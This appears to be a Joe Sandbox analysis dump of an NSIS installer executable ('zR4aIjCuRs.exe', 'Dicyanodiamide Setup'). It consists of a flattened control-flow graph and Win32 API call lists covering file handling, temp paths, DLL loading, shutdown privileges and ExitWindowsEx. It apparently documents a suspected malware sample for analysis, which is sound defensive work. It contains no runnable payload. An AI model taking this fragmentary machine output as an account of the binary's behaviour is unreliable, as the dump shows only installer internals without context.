3532->3539 3533->3539 3534 403828 3536 406080 36 API calls 3534->3536 3536->3537 3641 4038d0 3537->3641 3538 4062dc 17 API calls 3538->3539 3539->3531 3539->3534 3539->3538 3540 4058a3 2 API calls 3539->3540 3541 403813 CloseHandle 3539->3541 3650 406080 MoveFileExW 3539->3650 3540->3539 3541->3539 3542->3467 3543->3469 3545 40654e 5 API calls 3544->3545 3547 40336a 3545->3547 3546 403374 3546->3474 3547->3546 3548 405b8f 3 API calls 3547->3548 3549 40337c 3548->3549 3550 40586e 2 API calls 3549->3550 3551 403382 3550->3551 3654 405ddf 3551->3654 3658 405db0 GetFileAttributesW CreateFileW 3554->3658 3556 402f1d 3580 402f2d 3556->3580 3659 4062ba lstrcpynW 3556->3659 3558 402f43 3559 405bdb 2 API calls 3558->3559 3560 402f49 3559->3560 3660 4062ba lstrcpynW 3560->3660 3562 402f54 GetFileSize 3563 403050 3562->3563 3581 402f6b 3562->3581 3661 402e79 3563->3661 3565 403059 3567 403089 GlobalAlloc 3565->3567 3565->3580 3673 403347 SetFilePointer 3565->3673 3566 403331 ReadFile 3566->3581 3672 403347 SetFilePointer 3567->3672 3569 4030bc 3573 402e79 6 API calls 3569->3573 3571 403072 3574 403331 ReadFile 3571->3574 3572 4030a4 3575 403116 31 API calls 3572->3575 3573->3580 3576 40307d 3574->3576 3578 4030b0 3575->3578 3576->3567 3576->3580 3577 402e79 6 API calls 3577->3581 3578->3578 3579 4030ed SetFilePointer 3578->3579 3578->3580 3579->3580 3580->3480 3581->3563 3581->3566 3581->3569 3581->3577 3581->3580 3583 406694 5 API calls 3582->3583 3584 4039be 3583->3584 3585 4039c4 3584->3585 3586 4039d6 3584->3586 3682 406201 wsprintfW 3585->3682 3587 406188 3 API calls 3586->3587 3588 403a06 3587->3588 3589 403a25 lstrcatW 3588->3589 3592 406188 3 API calls 3588->3592 3591 4039d4 3589->3591 3674 403c80 3591->3674 3592->3589 3595 405c97 18 API calls 3596 403a57 3595->3596 3597 403aeb 3596->3597 3600 406188 3 API calls 3596->3600 3598 405c97 18 API calls 3597->3598 3599 403af1 3598->3599 3601 403b01 LoadImageW 3599->3601 3603 4062dc 17 API calls 3599->3603 3602 403a89 3600->3602 3604 403ba7 3601->3604 3605 403b28 RegisterClassW 3601->3605 3602->3597 3606 403aaa lstrlenW 3602->3606 3610 405bbc CharNextW 3602->3610 3603->3601 3609 40140b 2 API calls 3604->3609 3607 403bb1 3605->3607 3608 403b5e SystemParametersInfoW CreateWindowExW 3605->3608 3611 403ab8 lstrcmpiW 3606->3611 3612 403ade 3606->3612 3607->3537 3608->3604 3613 403bad 3609->3613 3614 403aa7 3610->3614 3611->3612 3615 403ac8 GetFileAttributesW 3611->3615 3616 405b8f 3 API calls 3612->3616 3613->3607 3618 403c80 18 API calls 3613->3618 3614->3606 3617 403ad4 3615->3617 3619 403ae4 3616->3619 3617->3612 3620 405bdb 2 API calls 3617->3620 3621 403bbe 3618->3621 3683 4062ba lstrcpynW 3619->3683 3620->3612 3623 403bca ShowWindow 3621->3623 3624 403c4d 3621->3624 3626 406624 3 API calls 3623->3626 3625 4053f5 5 API calls 3624->3625 3627 403c53 3625->3627 3628 403be2 3626->3628 3630 403c57 3627->3630 3631 403c6f 3627->3631 3629 403bf0 GetClassInfoW 3628->3629 3632 406624 3 API calls 3628->3632 3634 403c04 GetClassInfoW RegisterClassW 3629->3634 3635 403c1a DialogBoxParamW 3629->3635 3630->3607 3637 40140b 2 API calls 3630->3637 3633 40140b 2 API calls 3631->3633 3632->3629 3633->3607 3634->3635 3636 40140b 2 API calls 3635->3636 3636->3607 3637->3607 3638->3486 3639->3517 3640->3524 3642 4038e8 3641->3642 3643 4038da CloseHandle 3641->3643 3685 403915 3642->3685 3643->3642 3648->3527 3649->3539 3651 4060a1 3650->3651 3652 406094 3650->3652 3651->3539 3735 405f06 3652->3735 3655 405dec GetTickCount GetTempFileNameW 3654->3655 3656 405e22 3655->3656 3657 40338d 3655->3657 3656->3655 3656->3657 3657->3474 3658->3556 3659->3558 3660->3562 3662 402e82 3661->3662 3663 402e9a 3661->3663 3664 402e92 3662->3664 3665 402e8b DestroyWindow 3662->3665 3666 402ea2 3663->3666 3667 402eaa GetTickCount 3663->3667 3664->3565 3665->3664 3668 4066d0 2 API calls 3666->3668 3669 402eb8 CreateDialogParamW ShowWindow 3667->3669 3670 402edb 3667->3670 3671 402ea8 3668->3671 3669->3670 3670->3565 3671->3565 3672->3572 3673->3571 3675 403c94 3674->3675 3684 406201 wsprintfW 3675->3684 3677 403d05 3678 403d39 18 API calls 3677->3678 3680 403d0a 3678->3680 3679 403a35 3679->3595 3680->3679 3681 4062dc 17 API calls 3680->3681 3681->3680 3682->3591 3683->3597 3684->3677 3686 403923 3685->3686 3687 4038ed 3686->3687 3688 403928 FreeLibrary GlobalFree 3686->3688 3689 4059cc 3687->3689 3688->3687 3688->3688 3690 405c97 18 API calls 3689->3690 3691 4059ec 3690->3691 3692 4059f4 DeleteFileW 3691->3692 3693 405a0b 3691->3693 3694 403703 OleUninitialize 3692->3694 3696 405b2b 3693->3696 3725 4062ba lstrcpynW 3693->3725 3694->3493 3694->3494 3696->3694 3702 4065fd 2 API calls 3696->3702 3697 405a31 3698 405a44 3697->3698 3699 405a37 lstrcatW 3697->3699 3701 405bdb 2 API calls 3698->3701 3700 405a4a 3699->3700 3703 405a5a lstrcatW 3700->3703 3705 405a65 lstrlenW FindFirstFileW 3700->3705 3701->3700 3704 405b50 3702->3704 3703->3705 3704->3694 3706 405b8f 3 API calls 3704->3706 3705->3696 3719 405a87 3705->3719 3707 405b5a 3706->3707 3709 405984 5 API calls 3707->3709 3708 405b0e FindNextFileW 3711 405b24 FindClose 3708->3711 3708->3719 3712 405b66 3709->3712 3711->3696 3713 405b80 3712->3713 3714 405b6a 3712->3714 3716 405322 24 API calls 3713->3716 3714->3694 3717 405322 24 API calls 3714->3717 3716->3694 3720 405b77 3717->3720 3718 4059cc 60 API calls 3718->3719 3719->3708 3719->3718 3722 405322 24 API calls 3719->3722 3723 405322 24 API calls 3719->3723 3724 406080 36 API calls 3719->3724 3726 4062ba lstrcpynW 3719->3726 3727 405984 3719->3727 3721 406080 36 API calls 3720->3721 3721->3694 3722->3708 3723->3719 3724->3719 3725->3697 3726->3719 3728 405d8b 2 API calls 3727->3728 3729 405990 3728->3729 3730 4059b1 3729->3730 3731 4059a7 DeleteFileW 3729->3731 3732 40599f RemoveDirectoryW 3729->3732 3730->3719 3733 4059ad 3731->3733 3732->3733 3733->3730 3734 4059bd SetFileAttributesW 3733->3734 3734->3730 3736 405f36 3735->3736 3737 405f5c GetShortPathNameW 3735->3737 3762 405db0 GetFileAttributesW CreateFileW 3736->3762 3738 405f71 3737->3738 3739 40607b 3737->3739 3738->3739 3741 405f79 wsprintfA 3738->3741 3739->3651 3743 4062dc 17 API calls 3741->3743 3742 405f40 CloseHandle GetShortPathNameW 3742->3739 3744 405f54 3742->3744 3745 405fa1 3743->3745 3744->3737 3744->3739 3763 405db0 GetFileAttributesW CreateFileW 3745->3763 3747 405fae 3747->3739 3748 405fbd GetFileSize GlobalAlloc 3747->3748 3749 406074 CloseHandle 3748->3749 3750 405fdf 3748->3750 3749->3739 3751 405e33 ReadFile 3750->3751 3752 405fe7 3751->3752 3752->3749 3764 405d15 lstrlenA 3752->3764 3755 406012 3757 405d15 4 API calls 3755->3757 3756 405ffe lstrcpyA 3758 406020 3756->3758 3757->3758 3759 406057 SetFilePointer 3758->3759 3760 405e62 WriteFile 3759->3760 3761 40606d GlobalFree 3760->3761 3761->3749 3762->3742 3763->3747 3765 405d56 lstrlenA 3764->3765 3766 405d5e 3765->3766 3767 405d2f lstrcmpiA 3765->3767 3766->3755 3766->3756 3767->3766 3768 405d4d CharNextA 3767->3768 3768->3765 4159 40190f 4160 402c41 17 API calls 4159->4160 4161 401916 4160->4161 4162 405920 MessageBoxIndirectW 4161->4162 4163 40191f 4162->4163 4164 401491 4165 405322 24 API calls 4164->4165 4166 401498 4165->4166 4167 401d14 4168 402c1f 17 API calls 4167->4168 4169 401d1b 4168->4169 4170 402c1f 17 API calls 4169->4170 4171 401d27 GetDlgItem 4170->4171 4172 402592 4171->4172 4173 405296 4174 4052a6 4173->4174 4175 4052ba 4173->4175 4177 4052ac 4174->4177 4185 405303 4174->4185 4176 4052c2 IsWindowVisible 4175->4176 4182 4052d9 4175->4182 4178 4052cf 4176->4178 4176->4185 4180 40427d SendMessageW 4177->4180 4186 404bec SendMessageW 4178->4186 4179 405308 CallWindowProcW 4183 4052b6 4179->4183 4180->4183 4182->4179 4191 404c6c 4182->4191 4185->4179 4187 404c4b SendMessageW 4186->4187 4188 404c0f GetMessagePos ScreenToClient SendMessageW 4186->4188 4189 404c43 4187->4189 4188->4189 4190 404c48 4188->4190 4189->4182 4190->4187 4200 4062ba lstrcpynW 4191->4200 4193 404c7f 4201 406201 wsprintfW 4193->4201 4195 404c89 4196 40140b 2 API calls 4195->4196 4197 404c92 4196->4197 4202 4062ba lstrcpynW 4197->4202 4199 404c99 4199->4185 4200->4193 4201->4195 4202->4199 4203 402598 4204 4025c7 4203->4204 4205 4025ac 4203->4205 4207 4025fb 4204->4207 4208 4025cc 4204->4208 4206 402c1f 17 API calls 4205->4206 4213 4025b3 4206->4213 4209 402c41 17 API calls 4207->4209 4210 402c41 17 API calls 4208->4210 4212 402602 lstrlenW 4209->4212 4211 4025d3 WideCharToMultiByte lstrlenA 4210->4211 4211->4213 4212->4213 4214 40262f 4213->4214 4215 402645 4213->4215 4217 405e91 5 API calls 4213->4217 4214->4215 4216 405e62 WriteFile 4214->4216 4216->4215 4217->4214 4218 404c9e GetDlgItem GetDlgItem 4219 404cf0 7 API calls 4218->4219 4226 404f09 4218->4226 4220 404d93 DeleteObject 4219->4220 4221 404d86 SendMessageW 4219->4221 4222 404d9c 4220->4222 4221->4220 4224 404dd3 4222->4224 4225 4062dc 17 API calls 4222->4225 4223 404fed 4228 405099 4223->4228 4239 405046 SendMessageW 4223->4239 4261 404efc 4223->4261 4227 404231 18 API calls 4224->4227 4230 404db5 SendMessageW SendMessageW 4225->4230 4226->4223 4229 404f7a 4226->4229 4237 404bec 5 API calls 4226->4237 4233 404de7 4227->4233 4231 4050a3 SendMessageW 4228->4231 4232 4050ab 4228->4232 4229->4223 4235 404fdf SendMessageW 4229->4235 4230->4222 4231->4232 4236 4050d4 4232->4236 4241 4050c4 4232->4241 4242 4050bd ImageList_Destroy 4232->4242 4238 404231 18 API calls 4233->4238 4234 404298 8 API calls 4240 40528f 4234->4240 4235->4223 4244 405243 4236->4244 4260 404c6c 4 API calls 4236->4260 4265 40510f 4236->4265 4237->4229 4243 404df5 4238->4243 4245 40505b SendMessageW 4239->4245 4239->4261 4241->4236 4246 4050cd GlobalFree 4241->4246 4242->4241 4247 404eca GetWindowLongW SetWindowLongW 4243->4247 4254 404ec4 4243->4254 4257 404e45 SendMessageW 4243->4257 4258 404e81 SendMessageW 4243->4258 4259 404e92 SendMessageW 4243->4259 4249 405255 ShowWindow GetDlgItem ShowWindow 4244->4249 4244->4261 4248 40506e 4245->4248 4246->4236 4250 404ee3 4247->4250 4253 40507f SendMessageW 4248->4253 4249->4261 4251 404f01 4250->4251 4252 404ee9 ShowWindow 4250->4252 4270 404266 SendMessageW 4251->4270 4269 404266 SendMessageW 4252->4269 4253->4228 4254->4247 4254->4250 4257->4243 4258->4243 4259->4243 4260->4265 4261->4234 4262 405219 InvalidateRect 4262->4244 4263 40522f 4262->4263 4266 404ba7 20 API calls 4263->4266 4264 40513d SendMessageW 4268 405153 4264->4268 4265->4264 4265->4268 4266->4244 4267 4051c7 SendMessageW SendMessageW 4267->4268 4268->4262 4268->4267 4269->4261 4270->4226 4271 40149e 4272 4022f7 4271->4272 4273 4014ac PostQuitMessage 4271->4273 4273->4272 4274 401c1f 4275 402c1f 17 API calls 4274->4275 4276 401c26 4275->4276 4277 402c1f 17 API calls 4276->4277 4278 401c33 4277->4278 4279 401c48 4278->4279 4280 402c41 17 API calls 4278->4280 4281 401c58 4279->4281 4282 402c41 17 API calls 4279->4282 4280->4279 4283 401c63 4281->4283 4284 401caf 4281->4284 4282->4281 4286 402c1f 17 API calls 4283->4286 4285 402c41 17 API calls 4284->4285 4287 401cb4 4285->4287 4288 401c68 4286->4288 4289 402c41 17 API calls 4287->4289 4290 402c1f 17 API calls 4288->4290 4291 401cbd FindWindowExW 4289->4291 4292 401c74 4290->4292 4295 401cdf 4291->4295 4293 401c81 SendMessageTimeoutW 4292->4293 4294 401c9f SendMessageW 4292->4294 4293->4295 4294->4295 4296 402aa0 SendMessageW 4297 402aba InvalidateRect 4296->4297 4298 402ac5 4296->4298 4297->4298 4299 402821 4300 402827 4299->4300 4301 402ac5 4300->4301 4302 40282f FindClose 4300->4302 4302->4301 4303 4043a1 lstrlenW 4304 4043c0 4303->4304 4305 4043c2 WideCharToMultiByte 4303->4305 4304->4305 3072 404722 3073 40474e 3072->3073 3074 40475f 3072->3074 3166 405904 GetDlgItemTextW 3073->3166 3076 40476b GetDlgItem 3074->3076 3082 4047d7 3074->3082 3078 40477f 3076->3078 3077 404759 3080 40654e 5 API calls 3077->3080 3081 404793 SetWindowTextW 3078->3081 3087 405c3a 4 API calls 3078->3087 3079 4048ae 3083 404a5d 3079->3083 3139 405904 GetDlgItemTextW 3079->3139 3080->3074 3085 404231 18 API calls 3081->3085 3082->3079 3082->3083 3088 4062dc 17 API calls 3082->3088 3086 404298 8 API calls 3083->3086 3092 4047af 3085->3092 3093 404a71 3086->3093 3094 404789 3087->3094 3090 40483e SHBrowseForFolderW 3088->3090 3089 4048de 3140 405c97 3089->3140 3090->3079 3095 404856 CoTaskMemFree 3090->3095 3097 404231 18 API calls 3092->3097 3094->3081 3167 405b8f lstrlenW CharPrevW 3094->3167 3098 405b8f 3 API calls 3095->3098 3099 4047bd 3097->3099 3101 404863 3098->3101 3138 404266 SendMessageW 3099->3138 3104 40489a SetDlgItemTextW 3101->3104 3109 4062dc 17 API calls 3101->3109 3104->3079 3105 4048fb 3107 406694 5 API calls 3105->3107 3106 4047c3 3108 406694 5 API calls 3106->3108 3118 404902 3107->3118 3110 4047ca 3108->3110 3111 404882 lstrcmpiW 3109->3111 3110->3083 3113 4047d2 SHAutoComplete 3110->3113 3111->3104 3115 404893 lstrcatW 3111->3115 3112 404943 3174 4062ba lstrcpynW 3112->3174 3113->3082 3115->3104 3116 404911 GetDiskFreeSpaceExW 3116->3118 3126 40499b 3116->3126 3117 40494a 3119 405c3a 4 API calls 3117->3119 3118->3112 3118->3116 3170 405bdb lstrlenW 3118->3170 3120 404950 3119->3120 3122 404956 3120->3122 3123 404959 GetDiskFreeSpaceW 3120->3123 3122->3123 3124 404974 MulDiv 3123->3124 3123->3126 3124->3126 3125 404a0c 3128 404a2f 3125->3128 3175 40140b 3125->3175 3126->3125 3155 404ba7 3126->3155 3178 404253 KiUserCallbackDispatcher 3128->3178 3131 404a0e SetDlgItemTextW 3131->3125 3132 4049fe 3158 404ade 3132->3158 3134 404a4b 3134->3083 3136 404a58 3134->3136 3179 40467b 3136->3179 3138->3106 3139->3089 3182 4062ba lstrcpynW 3140->3182 3142 405ca8 3143 405c3a 4 API calls 3142->3143 3144 405cae 3143->3144 3145 4048e4 3144->3145 3146 40654e 5 API calls 3144->3146 3154 4062ba lstrcpynW 3145->3154 3152 405cbe 3146->3152 3147 405cef lstrlenW 3148 405cfa 3147->3148 3147->3152 3149 405b8f 3 API calls 3148->3149 3151 405cff GetFileAttributesW 3149->3151 3151->3145 3152->3145 3152->3147 3153 405bdb 2 API calls 3152->3153 3183 4065fd FindFirstFileW 3152->3183 3153->3147 3154->3105 3156 404ade 20 API calls 3155->3156 3157 4049f9 3156->3157 3157->3131 3157->3132 3159 404af7 3158->3159 3160 4062dc 17 API calls 3159->3160 3161 404b5b 3160->3161 3162 4062dc 17 API calls 3161->3162 3163 404b66 3162->3163 3164 4062dc 17 API calls 3163->3164 3165 404b7c lstrlenW wsprintfW SetDlgItemTextW 3164->3165 3165->3125 3166->3077 3168 405bb6 3167->3168 3169 405bab lstrcatW 3167->3169 3168->3081 3169->3168 3171 405be9 3170->3171 3172 405bfb 3171->3172 3173 405bef CharPrevW 3171->3173 3172->3118 3173->3171 3173->3172 3174->3117 3176 401389 2 API calls 3175->3176 3177 401420 3176->3177 3177->3128 3178->3134 3180 404689 3179->3180 3181 40468e SendMessageW 3179->3181 3180->3181 3181->3083 3182->3142 3184 406613 FindClose 3183->3184 3185 40661e 3183->3185 3184->3185 3185->3152 4306 4015a3 4307 402c41 17 API calls 4306->4307 4308 4015aa SetFileAttributesW 4307->4308 4309 4015bc 4308->4309 4310 4028ad 4311 402c41 17 API calls 4310->4311 4313 4028bb 4311->4313 4312 4028d1 4315 405d8b 2 API calls 4312->4315 4313->4312 4314 402c41 17 API calls 4313->4314 4314->4312 4316 4028d7 4315->4316 4338 405db0 GetFileAttributesW CreateFileW 4316->4338 4318 4028e4 4319 4028f0 GlobalAlloc 4318->4319 4320 402987 4318->4320 4321 402909 4319->4321 4322 40297e CloseHandle 4319->4322 4323 4029a2 4320->4323 4324 40298f DeleteFileW 4320->4324 4339 403347 SetFilePointer 4321->4339 4322->4320 4324->4323 4326 40290f 4327 403331 ReadFile 4326->4327 4328 402918 GlobalAlloc 4327->4328 4329 402928 4328->4329 4330 40295c 4328->4330 4332 403116 31 API calls 4329->4332 4331 405e62 WriteFile 4330->4331 4333 402968 GlobalFree 4331->4333 4334 402935 4332->4334 4335 403116 31 API calls 4333->4335 4336 402953 GlobalFree 4334->4336 4337 40297b 4335->4337 4336->4330 4337->4322 4338->4318 4339->4326 4340 401a30 4341 402c41 17 API calls 4340->4341 4342 401a39 ExpandEnvironmentStringsW 4341->4342 4343 401a4d 4342->4343 4345 401a60 4342->4345 4344 401a52 lstrcmpW 4343->4344 4343->4345 4344->4345 3186 402032 3187 402044 3186->3187 3188 4020f6 3186->3188 3189 402c41 17 API calls 3187->3189 3190 401423 24 API calls 3188->3190 3191 40204b 3189->3191 3197 402250 3190->3197 3192 402c41 17 API calls 3191->3192 3193 402054 3192->3193 3194 40206a LoadLibraryExW 3193->3194 3195 40205c GetModuleHandleW 3193->3195 3194->3188 3196 40207b 3194->3196 3195->3194 3195->3196 3206 406703 WideCharToMultiByte 3196->3206 3200 4020c5 3202 405322 24 API calls 3200->3202 3201 40208c 3203 401423 24 API calls 3201->3203 3204 40209c 3201->3204 3202->3204 3203->3204 3204->3197 3205 4020e8 FreeLibrary 3204->3205 3205->3197 3207 40672d GetProcAddress 3206->3207 3208 402086 3206->3208 3207->3208 3208->3200 3208->3201 4351 401735 4352 402c41 17 API calls 4351->4352 4353 40173c SearchPathW 4352->4353 4354 401757 4353->4354 4355 402a35 4356 402c1f 17 API calls 4355->4356 4357 402a3b 4356->4357 4358 402a72 4357->4358 4360 40288b 4357->4360 4361 402a4d 4357->4361 4359 4062dc 17 API calls 4358->4359 4358->4360 4359->4360 4361->4360 4363 406201 wsprintfW 4361->4363 4363->4360 4364 4014b8 4365 4014be 4364->4365 4366 401389 2 API calls 4365->4366 4367 4014c6 4366->4367 4368 401db9 GetDC 4369 402c1f 17 API calls 4368->4369 4370 401dcb GetDeviceCaps MulDiv ReleaseDC 4369->4370 4371 402c1f 17 API calls 4370->4371 4372 401dfc 4371->4372 4373 4062dc 17 API calls 4372->4373 4374 401e39 CreateFontIndirectW 4373->4374 4375 402592 4374->4375 4376 40283b 4377 402843 4376->4377 4378 402847 FindNextFileW 4377->4378 4381 402859 4377->4381 4379 4028a0 4378->4379 4378->4381 4382 4062ba lstrcpynW 4379->4382 4382->4381

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 40338f-4033cc SetErrorMode GetVersion 1 4033ce-4033d6 call 406694 0->1 2 4033df 0->2 1->2 7 4033d8 1->7 4 4033e4-4033f8 call 406624 lstrlenA 2->4 9 4033fa-403416 call 406694 * 3 4->9 7->2 16 403427-403486 #17 OleInitialize SHGetFileInfoW call 4062ba GetCommandLineW call 4062ba 9->16 17 403418-40341e 9->17 24 403490-4034aa call 405bbc CharNextW 16->24 25 403488-40348f 16->25 17->16 21 403420 17->21 21->16 28 4034b0-4034b6 24->28 29 4035c1-4035db GetTempPathW call 40335e 24->29 25->24 30 4034b8-4034bd 28->30 31 4034bf-4034c3 28->31 38 403633-40364d DeleteFileW call 402edd 29->38 39 4035dd-4035fb GetWindowsDirectoryW lstrcatW call 40335e 29->39 30->30 30->31 33 4034c5-4034c9 31->33 34 4034ca-4034ce 31->34 33->34 36 4034d4-4034da 34->36 37 40358d-40359a call 405bbc 34->37 42 4034f5-40352e 36->42 43 4034dc-4034e4 36->43 52 40359c-40359d 37->52 53 40359e-4035a4 37->53 54 403653-403659 38->54 55 4036fe-40370e call 4038d0 OleUninitialize 38->55 39->38 58 4035fd-40362d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40335e 39->58 49 403530-403535 42->49 50 40354b-403585 42->50 47 4034e6-4034e9 43->47 48 4034eb 43->48 47->42 47->48 48->42 49->50 56 403537-40353f 49->56 50->37 57 403587-40358b 50->57 52->53 53->28 61 4035aa 53->61 62 4036ee-4036f5 call 4039aa 54->62 63 40365f-40366a call 405bbc 54->63 75 403834-40383a 55->75 76 403714-403724 call 405920 ExitProcess 55->76 65 403541-403544 56->65 66 403546 56->66 57->37 59 4035ac-4035ba call 4062ba 57->59 58->38 58->55 68 4035bf 59->68 61->68 74 4036fa 62->74 79 4036b8-4036c2 63->79 80 40366c-4036a1 63->80 65->50 65->66 66->50 68->29 74->55 77 4038b8-4038c0 75->77 78 40383c-403852 GetCurrentProcess OpenProcessToken 75->78 85 4038c2 77->85 86 4038c6-4038ca ExitProcess 77->86 82 403854-403882 LookupPrivilegeValueW AdjustTokenPrivileges 78->82 83 403888-403896 call 406694 78->83 87 4036c4-4036d2 call 405c97 79->87 88 40372a-40373e call 40588b lstrcatW 79->88 84 4036a3-4036a7 80->84 82->83 102 4038a4-4038af ExitWindowsEx 83->102 103 403898-4038a2 83->103 93 4036b0-4036b4 84->93 94 4036a9-4036ae 84->94 85->86 87->55 99 4036d4-4036ea call 4062ba * 2 87->99 100 403740-403746 lstrcatW 88->100 101 40374b-403765 lstrcatW lstrcmpiW 88->101 93->84 98 4036b6 93->98 94->93 94->98 98->79 99->62 100->101 101->55 105 403767-40376a 101->105 102->77 106 4038b1-4038b3 call 40140b 102->106 103->102 103->106 108 403773 call 40586e 105->108 109 40376c-403771 call 4057f1 105->109 106->77 117 403778-403786 SetCurrentDirectoryW 108->117 109->117 118 403793-4037bc call 4062ba 117->118 119 403788-40378e call 4062ba 117->119 123 4037c1-4037dd call 4062dc DeleteFileW 118->123 119->118 126 40381e-403826 123->126 127 4037df-4037ef CopyFileW 123->127 126->123 129 403828-40382f call 406080 126->129 127->126 128 4037f1-403811 call 406080 call 4062dc call 4058a3 127->128 128->126 138 403813-40381a CloseHandle 128->138 129->55 138->126
                                  APIs
                                  • SetErrorMode.KERNELBASE ref: 004033B2
                                  • GetVersion.KERNEL32 ref: 004033B8
                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
                                  • OleInitialize.OLE32(00000000), ref: 0040342F
                                  • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
                                  • GetCommandLineW.KERNEL32(Dicyanodiamide Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\zR4aIjCuRs.exe",00000020,"C:\Users\user\Desktop\zR4aIjCuRs.exe",00000000,?,00000006,00000008,0000000A), ref: 00403498
                                    • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                    • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D2
                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035EF
                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403603
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040360B
                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040361C
                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403624
                                  • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403638
                                    • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Dicyanodiamide Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
                                  • ExitProcess.KERNEL32 ref: 00403724
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\zR4aIjCuRs.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\zR4aIjCuRs.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403746
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\zR4aIjCuRs.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403751
                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\zR4aIjCuRs.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403779
                                  • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
                                  • CopyFileW.KERNEL32(00442800,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037E7
                                  • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                  • ExitProcess.KERNEL32 ref: 004038CA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
